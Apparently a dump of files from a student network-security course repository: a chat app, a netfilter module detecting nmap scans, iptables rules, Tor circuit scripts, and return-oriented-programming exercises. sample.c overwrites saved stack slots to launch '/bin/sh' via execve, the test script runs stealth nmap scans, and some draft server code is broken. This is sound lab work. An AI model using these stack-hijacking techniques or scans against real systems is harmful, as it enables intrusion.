decrypt(int(data),key)\n\n print(\"Alice: \" + str(data.decode('UTF-8')))\n message = input(\"-> \")\n s.close()\n\nif __name__ == '__main__':\n Main()\n"
},
{
"alpha_fraction": 0.5067778825759888,
"alphanum_fraction": 0.5177267789840698,
"avg_line_length": 19.414894104003906,
"blob_id": "7c50229fdb17528723ff1c9200124273cd367a00",
"content_id": "4f9b35e3d3dee61859c034d1a184e4642f2af221",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1918,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 94,
"path": "/server.py",
"repo_name": "nickyfoster/pycryptochat",
"src_encoding": "UTF-8",
"text": "import socket\n\n\n\n\ndef run(host, port):\n\tserver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\tserver.bind((host, port))\n\t\n\tclients = {}\n\t\n\twhile 1:\n\t\tdata, addr = server.recvfrom(65536)\n\t\t\n\t\tif addr[0] not in cleints.keys():\n\t\t\tif data not in people.values():\n\t\t\t\tpeople[addr[0]] = data\n\t\t\telse:\n\t\t\t\tpeople[addr[0]] = data + \"_\"\n\t\t\tcontinue\n\t\t\t\n\t\tdata = data.strip()\n\t\tif data != '':\n\t\t\tprint(f\"{addr}:{data}\")\n\t\t\tfor i in clients:\n\t\t\t\tserver.sendto(clients[addr[0]]+\": \" + data, (i,port))\n\t\tserv.close()\n\nif __name__ == \"__main__\":\n\trun('localhost', 5005)\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass Server:\n\tdef __init__(self, host=\"\", port=\"\", timeout=-1):\n\t\tself.host = host\n\t\tself.port = port\n\t\tself.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\tself.sock.bind((host, port))\n\t\tself.recv_buffer = 4096\n\t\n\t\n\t# REVIEW\n\tdef recv(self):\n\t\twhile 1:\n ready_to_read,ready_to_write,in_error = select.select(SOCKET_LIST,[],[],0)\n\n for sock in ready_to_read:\n if sock == server_socket:\n sockfd, addr = server_socket.accept()\n SOCKET_LIST.append(sockfd)\n print \"Client (%s, %s) connected\" % addr\n broadcast(server_socket, sockfd, \"[%s:%s] entered our chatting room\\n\" % addr)\n\n\n else:\n try:\n data = sock.recv(RECV_BUFFER)\n if data:\n broadcast(server_socket, sock, \"\\r\" + '[' + str(sock.getpeername()) + '] ' + data)\n else:\n if sock in SOCKET_LIST:\n SOCKET_LIST.remove(sock)\n broadcast(server_socket, sock, \"Client (%s, %s) is offline\\n\" % addr)\n except:\n broadcast(server_socket, sock, \"Client (%s, %s) is offline\\n\" % addr)\n continue\n\t\n\tdef broadcast(server, sock, msg):\n\t\t\n\t\n\t\n\nclass Client:\n\"\"\""
}
] | 4 |
underhood31/NSSII
|
https://github.com/underhood31/NSSII
|
1dcdddad4ae7820afaff2ff02909c7b311b01f4c
|
1efd9784ada99edbe6cdda3d0f31251274ad90f2
|
9bf40c6dfa1d254e242f7be721b4370cf0cfc517
|
refs/heads/main
| 2023-05-18T06:01:46.065913 | 2021-06-08T18:55:12 | 2021-06-08T18:55:12 | 338,088,201 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5463917255401611,
"alphanum_fraction": 0.5498281717300415,
"avg_line_length": 12.857142448425293,
"blob_id": "80ab92acf0c3ace8f60f49ffddd2b5341cb569c7",
"content_id": "f8226d1b61934eb3901a70bbaae49f505a27d32d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 291,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 21,
"path": "/Assignment_2/return_oriented_programming/overflow.c",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n\nvoid g()\n{\n printf(\"now inside g()!\\n\");\n}\n\n\nvoid f()\n{ \n printf(\"now inside f()!\\n\");\n // can only modify this section\n // cant call g(), maybe use g (pointer to function)\n}\n\nint main (int argc, char *argv[])\n{\n f();\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6412917971611023,
"alphanum_fraction": 0.644059956073761,
"avg_line_length": 27.339868545532227,
"blob_id": "4e5d24e21512fcce7e2f2ea3fa7423d027ded1f2",
"content_id": "aaa581b9880dd97f593a02a51b4b86d18ee7d230",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 4335,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 153,
"path": "/Assignment_1/module/backup.c",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#include <linux/init.h>\n#include <linux/module.h>\n#include <linux/kernel.h>\n#include <linux/netfilter.h>\n#include <linux/netfilter_ipv4.h>\n#include <linux/ip.h>\n#include <linux/tcp.h>\n#include <net/netfilter/nf_conntrack.h>\n\nMODULE_LICENSE(\"GPL\");\nMODULE_AUTHOR(\"Manavjeet Singh\");\nMODULE_DESCRIPTION(\"A netfilter hook module.\");\nMODULE_VERSION(\"1.0\");\n\nstatic struct nf_hook_ops *my_nf_hook = NULL;\nstatic struct nf_hook_ops *my_nf_conntrack_hook = NULL;\n// static unsigned int hfunc(void *priv, struct sk_buff *skb, const struct nf_hook_state *state) {\n// \tstruct iphdr *iph;\n// \tstruct udphdr *udph;\n// \tif (!skb)\n// \t\treturn NF_ACCEPT;\n\n// \tiph = ip_hdr(skb);\n// \tif (iph->protocol == IPPROTO_UDP) {\n// \t\tudph = udp_hdr(skb);\n// \t\tif (ntohs(udph->dest) == 53) {\n// \t\t\treturn NF_ACCEPT;\n// \t\t}\n// \t}\n// \telse if (iph->protocol == IPPROTO_TCP) {\n// \t\treturn NF_ACCEPT;\n// \t}\n\t\n// \treturn NF_DROP;\n// }\n\nstatic unsigned int hook_pre_route(void *priv, struct sk_buff *skb, const struct nf_hook_state *state) {\n\tstruct iphdr *iph;\n\tstruct tcphdr *tcph;\n\tunsigned int option_length;\n\tif (!skb)\n\t\treturn NF_ACCEPT;\n\n\tiph = ip_hdr(skb);\n\tif (iph->protocol == IPPROTO_TCP) {\n\t\ttcph=tcp_hdr(skb);\n\n\t\tif (!tcph->syn && !tcph->rst && !tcph->psh && !tcph->ack && !tcph->urg && !tcph->ece && !tcph->cwr && !tcph->fin) {\n\t\t\tprintk(KERN_INFO \"TCP null scan packet detected\\n\");\n\t\t\treturn NF_DROP;\n\t\t}\n\t\telse if(!tcph->syn && !tcph->rst && tcph->psh && !tcph->ack && tcph->urg && !tcph->ece && !tcph->cwr && tcph->fin){\n\t\t\tprintk(KERN_INFO \"Xmas scan detected\\n\");\n\t\t\treturn NF_DROP;\n\n\t\t}\n\t\telse if (tcph->syn) {\n\n\t\t\t// option_length=tcp_optlen(skb);\n\t\t\t// if(option_length==4) {\n\t\t\t// \tprintk(KERN_INFO \"nmap half open TCP SYN packet found\");\n\t\t\t// \treturn NF_DROP;\n\t\t\t// }\n\t\t}\n\t\telse if (tcph->ack) {\n\t\t\t// option_length=tcp_optlen(skb);\n\t\t\t// printk(KERN_INFO \"option_length: %d\\n\", option_length);\n\n\t\t}\n\n\t}\n\n\t\n\treturn NF_ACCEPT;\n}\n\nstatic unsigned int hook_conntrack (void *priv, struct sk_buff *skb, const struct nf_hook_state *state) {\n\tstruct iphdr *iph;\n\tstruct tcphdr *tcph;\n\tstruct nf_conn *ct;\n\tenum ip_conntrack_info conn_info;\n\n\tiph=ip_hdr(skb);\n\tif (iph->protocol == IPPROTO_TCP) {\n\t\tct=nf_ct_get(skb,&conn_info);\n\n\t\ttcph=tcp_hdr(skb);\n\n\t\tif (conn_info == IP_CT_ESTABLISHED ){\n\t\t\tprintk(KERN_INFO \"IP_CT_ESTABLISHED\\n\");\n\t\t}\n\t\telse if (conn_info == IP_CT_RELATED ){\n\t\t\tprintk(KERN_INFO \"IP_CT_RELATED\\n\");\n\t\t}\n\t\telse if (conn_info == IP_CT_NEW ){\n\t\t\tprintk(KERN_INFO \"IP_CT_NEW\\n\");\n\t\t}\n\t\telse if (conn_info == IP_CT_IS_REPLY ){\n\t\t\tprintk(KERN_INFO \"IP_CT_IS_REPLY\\n\");\n\t\t}\n\t\telse if (conn_info == IP_CT_ESTABLISHED_REPLY ){\n\t\t\tprintk(KERN_INFO \"IP_CT_ESTABLISHED_REPLY\\n\");\n\t\t}\n\t\telse if (conn_info == IP_CT_RELATED_REPLY ){\n\t\t\tprintk(KERN_INFO \"IP_CT_RELATED_REPLY\\n\");\n\t\t}\n\t\telse if (conn_info == IP_CT_NUMBER ){\n\t\t\tprintk(KERN_INFO \"IP_CT_NUMBER\\n\");\n\t\t}\n\t\telse{\n\t\t\tprintk(KERN_INFO \"NONE\\n\");\n\t\t}\n\t}\n\treturn NF_ACCEPT;\n}\n\nstatic int __init my_net_module_init(void) {\n\tprintk(KERN_INFO \"Initializing my netfilter module\\n\");\n\n\t/*Hook for which connection tracking is not required*/\n\tmy_nf_hook = (struct nf_hook_ops*) kzalloc(sizeof(struct nf_hook_ops), GFP_KERNEL);\n\n\tmy_nf_hook->hook \t\t\t= (nf_hookfn*)hook_pre_route;\t/* hook function */\n\tmy_nf_hook->hooknum \t\t= NF_INET_PRE_ROUTING;\t\t\t/* received packets */\n\tmy_nf_hook->pf \t\t\t\t= PF_INET;\t\t\t\t\t\t/* IPv4 */\n\tmy_nf_hook->priority \t\t= NF_IP_PRI_FIRST;\t\t\t\t/* max hook priority */\n\n\tnf_register_net_hook(&init_net, my_nf_hook);\n\n\t/*Hook which requires connection tracking using conntrack*/\n\tmy_nf_conntrack_hook = (struct nf_hook_ops*) kzalloc(sizeof(struct nf_hook_ops), GFP_KERNEL);\n\n\tmy_nf_conntrack_hook->hook \t\t= (nf_hookfn*)hook_conntrack;\t/* hook function */\n\tmy_nf_conntrack_hook->hooknum \t= NF_INET_PRE_ROUTING;\t\t\t/* received packets */\n\tmy_nf_conntrack_hook->pf \t\t= PF_INET;\t\t\t\t\t\t/* IPv4 */\n\tmy_nf_conntrack_hook->priority \t= NF_IP_PRI_CONNTRACK + 150;\t/* priority less than conntrack */\n\n\tnf_register_net_hook(&init_net, my_nf_conntrack_hook);\n\n\treturn 0;\n}\n\nstatic void __exit my_net_module_exit(void) {\n\n\tnf_unregister_net_hook(&init_net, my_nf_hook);\n\tnf_unregister_net_hook(&init_net, my_nf_conntrack_hook);\n\tkfree(my_nf_hook);\n\tkfree(my_nf_conntrack_hook);\n\tprintk(KERN_INFO \"Exiting my netfilter module\\n\");\n}\n\nmodule_init(my_net_module_init);\nmodule_exit(my_net_module_exit);"
},
{
"alpha_fraction": 0.6053984761238098,
"alphanum_fraction": 0.6844472885131836,
"avg_line_length": 43.42856979370117,
"blob_id": "9485e346024f7fb1cb58addc464d02dfc843615e",
"content_id": "ea927352230fc581cbf2ef789c47ba18ac821a02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1556,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 35,
"path": "/Exercise_1/VM_Files/VM2/firewall-conf",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\n#-----Dropping requests from VM2\nsudo iptables -A OUTPUT -s 10.0.1.2/24 -j DROP\n\n#-------------\n\nsudo iptables -A FORWARD -i enp0s8 -o enp0s9 -p tcp --syn --dport 80 -m conntrack --ctstate NEW -j ACCEPT\nsudo iptables -A FORWARD -i enp0s8 -o enp0s9 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT\n\nsudo iptables -t nat -A PREROUTING -i enp0s8 -p tcp --dport 80 -j DNAT --to-destination 10.0.1.1\nsudo iptables -t nat -A POSTROUTING -o enp0s9 -p tcp --dport 80 -d 10.0.1.1 -j SNAT --to-source 10.0.1.2\n\nsudo iptables -t nat -A PREROUTING -i enp0s9 -p tcp -j DNAT --to-destination 10.0.0.1\nsudo iptables -t nat -A POSTROUTING -o enp0s8 -p tcp -d 10.0.0.1 -j SNAT --to-source 10.0.0.2\n\nsudo iptables -A FORWARD -o enp0s8 -i enp0s9 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT\n\n#--------------\n\nsudo iptables -A FORWARD -i enp0s8 -o enp0s9 -p tcp --syn --dport 443 -m conntrack --ctstate NEW -j ACCEPT\nsudo iptables -A FORWARD -i enp0s8 -o enp0s9 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT\n\nsudo iptables -t nat -A PREROUTING -i enp0s8 -p tcp --dport 443 -j DNAT --to-destination 10.0.1.1\nsudo iptables -t nat -A POSTROUTING -o enp0s9 -p tcp --dport 443 -d 10.0.1.1 -j SNAT --to-source 10.0.1.2\n\nsudo iptables -t nat -A PREROUTING -i enp0s9 -p tcp -j DNAT --to-destination 10.0.0.1\nsudo iptables -t nat -A POSTROUTING -o enp0s8 -p tcp -d 10.0.0.1 -j SNAT --to-source 10.0.0.2\n\nsudo iptables -A FORWARD -o enp0s8 -i enp0s9 -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT\n\n#-------------\n\n\nsudo iptables -P FORWARD DROP\n\n"
},
{
"alpha_fraction": 0.4501992166042328,
"alphanum_fraction": 0.6972111463546753,
"avg_line_length": 30.375,
"blob_id": "4898be5040db3cc8faa8edb36c75e0f392d29ccf",
"content_id": "e3591857f66cdc88ec3ad7b57a6cbfa29dab0e90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 251,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 8,
"path": "/Exercise_1/VM_Files/VM2/start-network-VM2",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\nip link set dev enp0s8 up\nip addr add 10.0.0.2/24 dev enp0s8 \nroute add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.2\n\nip link set dev enp0s9 up\nip addr add 10.0.1.2/24 dev enp0s9 \nroute add -net 10.0.1.0 netmask 255.255.255.0 gw 10.0.1.2\n"
},
{
"alpha_fraction": 0.44680851697921753,
"alphanum_fraction": 0.4764437675476074,
"avg_line_length": 28.22222137451172,
"blob_id": "a28534ee6e06abaa0ddbdf54f9aaf57834235e0c",
"content_id": "dd87d9dff40b9254943e6fad418d8d24e6969334",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1316,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 45,
"path": "/Assignment_1/Submission/testscript.sh",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\necho \":::START:::\"\n#read -n 1 -r -s -p $'Make sure that kernel module is NOT inserted. Press enter to continue...'\n#echo \"\"\n#echo \"Running nmap commands to show sample output without loading the kernel module\"\n#echo \"\"\n#echo \"::nmap Null scan::\"\n#sudo nmap -sN 10.0.0.2\n#echo \"\"\n#echo \"--------------------------------------------------\"\n#echo \"\"\n#echo \"::nmap Fin scan::\"\n#sudo nmap -sF 10.0.0.2\n#echo \"\"\n#echo \"--------------------------------------------------\"\n#echo \"\"\n#echo \"::nmap Xmas scan::\"\n#sudo nmap -sX 10.0.0.2\n#echo \"\"\n#echo \"--------------------------------------------------\"\n#echo \"\"\nread -n 1 -r -s -p $'Load the kernel module in VM2. Press enter to continue...'\necho \"\"\necho \"::nmap Null scan::\"\nsudo nmap -sN 10.0.0.2\necho \"\"\nread -n 1 -r -s -p $'Check the syslog on VM2. Press enter to continue...'\necho \"\"\necho \"--------------------------------------------------\"\necho \"\"\necho \"::nmap Fin scan::\"\nsudo nmap -sF 10.0.0.2\necho \"\"\nread -n 1 -r -s -p $'Check the syslog on VM2. Press enter to continue...'\necho \"\"\necho \"--------------------------------------------------\"\necho \"\"\necho \"::nmap Xmas scan::\"\nsudo nmap -sX 10.0.0.2\necho \"\"\nread -n 1 -r -s -p $'Check the syslog on VM2. Press enter to continue...'\necho \"\"\necho \"--------------------------------------------------\"\necho \"\"\n\n"
},
{
"alpha_fraction": 0.7010676264762878,
"alphanum_fraction": 0.7829181551933289,
"avg_line_length": 69.25,
"blob_id": "2d08b2e0ce3de4f3984158b639eda1897952c882",
"content_id": "411c40124df14d13296d767ac84243330abcdcce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 281,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 4,
"path": "/Exercise_3/VM3-ex3/gen_cert.sh",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "openssl genrsa -out private-keyVM3.pem 2048\nopenssl rsa -in private-keyVM3.pem -pubout -out public-keyVM3.pem\nopenssl req -new -x509 -key private-keyVM3.pem -out certVM3.pem -days 360\nopenssl pkcs12 -export -in certVM3.pem -inkey private-keyVM3.pem -out certVM3.p12 -name certVM3\n"
},
{
"alpha_fraction": 0.7010676264762878,
"alphanum_fraction": 0.7829181551933289,
"avg_line_length": 69.25,
"blob_id": "ecc0b13214f7c4d656c0a6e510d6f1416411c08d",
"content_id": "fcc9af19d29bf1dbb260dd0b5da3cad8e1da0182",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 281,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 4,
"path": "/Exercise_3/VM2-Ex3/gen_cert.sh",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "openssl genrsa -out private-keyVM2.pem 2048\nopenssl rsa -in private-keyVM2.pem -pubout -out public-keyVM2.pem\nopenssl req -new -x509 -key private-keyVM2.pem -out certVM2.pem -days 360\nopenssl pkcs12 -export -in certVM2.pem -inkey private-keyVM2.pem -out certVM2.p12 -name certVM2\n"
},
{
"alpha_fraction": 0.5415472984313965,
"alphanum_fraction": 0.5625597238540649,
"avg_line_length": 28.08333396911621,
"blob_id": "a478ef056dcb1dbf5ccd5875706d0bd1b0b4dcc3",
"content_id": "09b82fefbbdfef735514a6efa0edcd6078bd3989",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1047,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 36,
"path": "/Assignment_2/return_oriented_programming/bonus.c",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <string.h>\n#include <unistd.h>\n#include <stdlib.h>\nvoid called(unsigned long a, unsigned long b, unsigned long c){\n\tprintf(\"%ld %ld %ld\\n\",a,b,c);\n} \n\nint main(){\n\tchar name[64],*cptr;\n void *ptr;\n\tprintf(\"buffer address: %p\\n\", name); //print address of buffer\n puts(\"Enter text for name:\");\n gets(name);\n printf(\"content of buffer: %s\\n\", name);\n printf(\"execve of execve: %p\\n\", execve);\n \n memset(name,0,64);\n strcpy(name,\"hello world\\n\"); \n \n cptr = name+80+8;\n ptr = (unsigned long *)cptr;\n \n\t\n \n *((int*)(ptr+5*(sizeof(void*)))) = (int) 1; //first arg\n\t*((unsigned long*)(ptr+5*(sizeof(void*))+sizeof(int))) = (unsigned long*) name; //second //arg\n\t*((unsigned long*)(ptr+6*(sizeof(void*))+sizeof(int)))=(unsigned long)12;\t//third arg\n\t*((unsigned long *)(ptr+3*(sizeof(void*)))) = (unsigned long *)write;\n\t//OR if randomization is disabled\n\t// *(ptr+3) = (unsigned long *)0xf7e4a2b0;\n\t\n\n return 0;\n\n}\n"
},
{
"alpha_fraction": 0.7795275449752808,
"alphanum_fraction": 0.8110235929489136,
"avg_line_length": 62.5,
"blob_id": "4676c2f9ba0ffd9b2022f67c6d82f30d4528b001",
"content_id": "ed0a08fc032c0ad636c2a4386834b6625d7f8ce9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 127,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 2,
"path": "/README.md",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "# NSSII\nThis repo contains all the assignmets of Network and System Security Course II offered in winter semester 2021, IIITD.\n"
},
{
"alpha_fraction": 0.6519733667373657,
"alphanum_fraction": 0.6740133166313171,
"avg_line_length": 30.483871459960938,
"blob_id": "7478be86a36632b6d396aee7250d879694dab273",
"content_id": "4f3d772780db022622c4d6d1740ffe695b486f44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1951,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 62,
"path": "/Exercise_4/Part2/manual_tor.py",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "# https://stem.torproject.org/tutorials/to_russia_with_love.html\n# https://stackoverflow.com/questions/2473655/how-to-make-a-call-to-an-executable-from-python-script\nfrom stem.control import Controller\nimport stem\nimport stem.process\nimport getpass\nfrom stem.util import term\nimport subprocess\nfrom os import system\nimport os\nFILEPATH = \"/tmp/relay_fingerprints.txt\"\nPROG = \"gedit\"\n#https://metrics.torproject.org/rs.html#toprelays\nEXIT_FINGERPRINT = '18EAE30A4585BEB0D63D36BCFE3F9CA786CB55C7'\ndef print_bootstrap_lines(line):\n if \"Bootstrapped \" in line:\n print(term.format(line, term.Color.BLUE))\n\nif __name__ == '__main__':\n\ttor_p = stem.process.launch_tor(init_msg_handler = print_bootstrap_lines, torrc_path=\"./VM1/VM1\")\n\n\ttry: \n\t\twith Controller.from_port() as controller:\n\t\t\tauth_err=0\n\t\t\ttry:\n\t\t\t\tprint(\"pass: tor\")\n\t\t\t\tps=getpass.getpass(\"Controller password: \")\n\t\t\t\tcontroller.authenticate(password=ps)\n\t\t\texcept:\n\t\t\t\tprint(\"Cannot authenticate controller!\")\n\t\t\t\tauth_err=1\n\t\t\t\n\t\t\tif not auth_err:\n\n\t\t\t\t# print(\"Tor is running version %s\" % controller.get_version())\n\n\t\t\t\t# bytes_read = int(controller.get_info(\"traffic/read\"))\n\t\t\t\t# bytes_written = int(controller.get_info(\"traffic/written\"))\n\n\t\t\t\t# print(\"My Tor relay has read %s Mbytes and written %s.\" % (str(bytes_read/((1024**2))), str(bytes_written/(1024**2))))\n\n\t\t\t\tlength=int(input(\"Enter relay size:\")) \n\t\t\t\tstream=[]\n\t\t\t\tfor _r in range(length):\n\t\t\t\t\t_s=input(\"relay \"+str(_r+1)+\":\")\n\t\t\t\t\tstream.append(_s)\n\n\t\t\t\tprint(\"::Creating circuit\")\n\n\t\t\t\tcircuit_id = controller.new_circuit(stream, await_build = True)\n\n\t\t\t\tinput(\"press enter to exit...\")\n\t\t\t\t\n\t\t\t\t# ch=input(\"Do you want to kill tor? (y/n)\")\n\t\t\t\t# if(ch=='y' or ch=='Y'):\n\t\t\t\t# \tprint(\"::Killing tor\")\n\t\t\t\t# \targs= (\"systemctl\" , \"stop\", \"tor\")\n\t\t\t\t# \tpopen = subprocess.Popen(args, stdout=subprocess.PIPE)\n\texcept stem.SocketError as er:\n\t\tprint(\"Error: \", er, \"\\nTry starting tor service.\")\n\tfinally:\n\t\ttor_p.kill()"
},
{
"alpha_fraction": 0.5366120338439941,
"alphanum_fraction": 0.5519125461578369,
"avg_line_length": 24.41666603088379,
"blob_id": "f6c4d10c3f698d196aacc16342490d521993f5f7",
"content_id": "7755de16be27f42a488a65a929c12b726d2b4dbf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 915,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 36,
"path": "/Assignment_2/return_oriented_programming/sample.c",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <string.h>\n#include <unistd.h>\n#include <stdlib.h>\nvoid called(unsigned long a, unsigned long b, unsigned long c){\n\tprintf(\"%ld %ld %ld\\n\",a,b,c);\n} \n\nint main(){\n\tchar name[64],*cptr;\n unsigned long *ptr;\n\tprintf(\"buffer address: %p\\n\", name); //print address of buffer\n puts(\"Enter text for name:\");\n gets(name);\n printf(\"content of buffer: %s\\n\", name);\n printf(\"execve of execve: %p\\n\", execve);\n \n memset(name,0,64);\n strcpy(name,\"/bin/sh\"); \n \n cptr = name+80+8;\n ptr = (unsigned long *)cptr;\n \n\t\n \n *(ptr+5) = (unsigned long *) name; //first arg\n\t*(ptr+6) = (unsigned long*) NULL; //second //arg\n\t*(ptr+7)=(unsigned long *)NULL;\t//third arg\n\t// *(ptr+3) = (unsigned long *)execve;\n\t//OR if randomization is disabled\n\t*(ptr+3) = (unsigned long *)execve;\n\t\n\n return 0;\n\n}\n"
},
{
"alpha_fraction": 0.7688888907432556,
"alphanum_fraction": 0.7711111307144165,
"avg_line_length": 29.066667556762695,
"blob_id": "c78b7668c02d70548ef5c6b2c73f106e8f59d149",
"content_id": "b8c9604bcbed7167e2eb3040108f947e54e7ca5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 450,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 15,
"path": "/Exercise_4/Part2/VM1/run_tor.py",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "from stem.control import Controller\nimport stem\nimport stem.process\nimport getpass\nimport subprocess\nfrom os import system\nfrom stem.util import term\nimport os\ndef print_bootstrap_lines(line):\n if \"Bootstrapped \" in line:\n print(term.format(line, term.Color.BLUE))\n\n# tor_p = stem.process.launch_tor(init_msg_handler = print_bootstrap_lines)\ntor_p = stem.process.launch_tor(init_msg_handler = print_bootstrap_lines, torrc_path=\"VM1\")\ntor_p.kill()"
},
{
"alpha_fraction": 0.4263322949409485,
"alphanum_fraction": 0.6896551847457886,
"avg_line_length": 38.875,
"blob_id": "49b78d6065d8bf6b6bde6f1f0199aae541382a3d",
"content_id": "1957c9739e310f08deb7806e4acd73b6afb50406",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 319,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 8,
"path": "/Exercise_1/VM_Files/VM1/start-network-VM1",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\nip link set dev enp0s8 up\nip addr add 10.0.0.1/24 dev enp0s8 \n#ip route add 10.0.0.0/24 via 10.0.0.1 dev enp0s8\n#ip route add 10.0.1.0/24 via 10.0.0.1 dev enp0s8\nroute add -net 10.0.1.0 netmask 255.255.255.0 gw 10.0.0.2\nroute add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1\n#route add default gw 10.0.0.1\n"
},
{
"alpha_fraction": 0.6568293571472168,
"alphanum_fraction": 0.67234206199646,
"avg_line_length": 27.7391300201416,
"blob_id": "237c93f244c3638963b7649cd4f60d1e1fc3657c",
"content_id": "4d479923cbde5a9decfd8fd9231551ce3039dd79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2643,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 92,
"path": "/Exercise_4/Part1/automate_tor.py",
"repo_name": "underhood31/NSSII",
"src_encoding": "UTF-8",
"text": "# https://stem.torproject.org/tutorials/to_russia_with_love.html\n# https://stackoverflow.com/questions/2473655/how-to-make-a-call-to-an-executable-from-python-script\nfrom stem.control import Controller\nimport stem\nimport stem.process\nimport getpass\nimport subprocess\nfrom os import system\nfrom stem.util import term\nimport os\nFILEPATH = \"/tmp/relay_fingerprints.txt\"\nPROG = \"gedit\"\n#https://metrics.torproject.org/rs.html#toprelays\nEXIT_FINGERPRINT = '18EAE30A4585BEB0D63D36BCFE3F9CA786CB55C7'\n\ndef clear():\n\tclear = lambda: system('clear')\n\n# from https://stem.torproject.org/tutorials/to_russia_with_love.html\ndef print_bootstrap_lines(line):\n if \"Bootstrapped \" in line:\n print(term.format(line, term.Color.BLUE))\n\n\nif __name__ == '__main__':\n\ttry: \n\t\twith Controller.from_port() as controller:\n\t\t\tauth_err=0\n\t\t\ttry:\n\t\t\t\tprint(\"pass: tor\")\n\t\t\t\tps=getpass.getpass(\"Controller password: \")\n\t\t\t\tcontroller.authenticate(password=ps)\n\t\t\texcept:\n\t\t\t\tprint(\"Cannot authenticate controller!\")\n\t\t\t\tauth_err=1\n\t\t\t\n\t\t\tif not auth_err:\n\n\t\t\t\t# print(\"Tor is running version %s\" % controller.get_version())\n\n\t\t\t\t# bytes_read = int(controller.get_info(\"traffic/read\"))\n\t\t\t\t# bytes_written = int(controller.get_info(\"traffic/written\"))\n\n\t\t\t\t# print(\"My Tor relay has read %s Mbytes and written %s.\" % (str(bytes_read/((1024**2))), str(bytes_written/(1024**2))))\n\n\t\t\t\tprint(\"::Creating temp file\")\n\t\t\t\ttry:\n\t\t\t\t\tf = open(FILEPATH, \"w\")\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"ERROR::cannot create file\")\n\n\t\t\t\tprint(\"::Writing relay fingerprints\")\n\t\t\t\ttry:\n\t\t\t\t\trelay_fingerprints = [desc.fingerprint for desc in controller.get_network_statuses()]\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"ERROR::cannot get network statuses, check internet\")\n\n\t\t\t\tfor fingerprints in relay_fingerprints:\n\t\t\t\t\tf.write(fingerprints)\n\t\t\t\t\tf.write(\"\\n\")\n\t\t\t\tf.close()\n\n\t\t\t\targs= (PROG , FILEPATH)\n\t\t\t\tpopen = subprocess.Popen(args, stdout=subprocess.PIPE)\n\n\t\t\t\tclear()\n\t\t\t\tlength=int(input(\"Enter relay size(exluding the exit point: \")) \n\t\t\t\tstream=[]\n\t\t\t\tfor _r in range(length):\n\t\t\t\t\t_s=input(\"relay \"+str(_r+1)+\":\")\n\t\t\t\t\tstream.append(_s)\n\t\t\t\tstream.append(EXIT_FINGERPRINT)\n\n\t\t\t\tprint(\"::Creating circuit\")\n\n\t\t\t\tcircuit_id = controller.new_circuit(stream, await_build = True)\n\n\t\t\t\tinput(\"press enter to 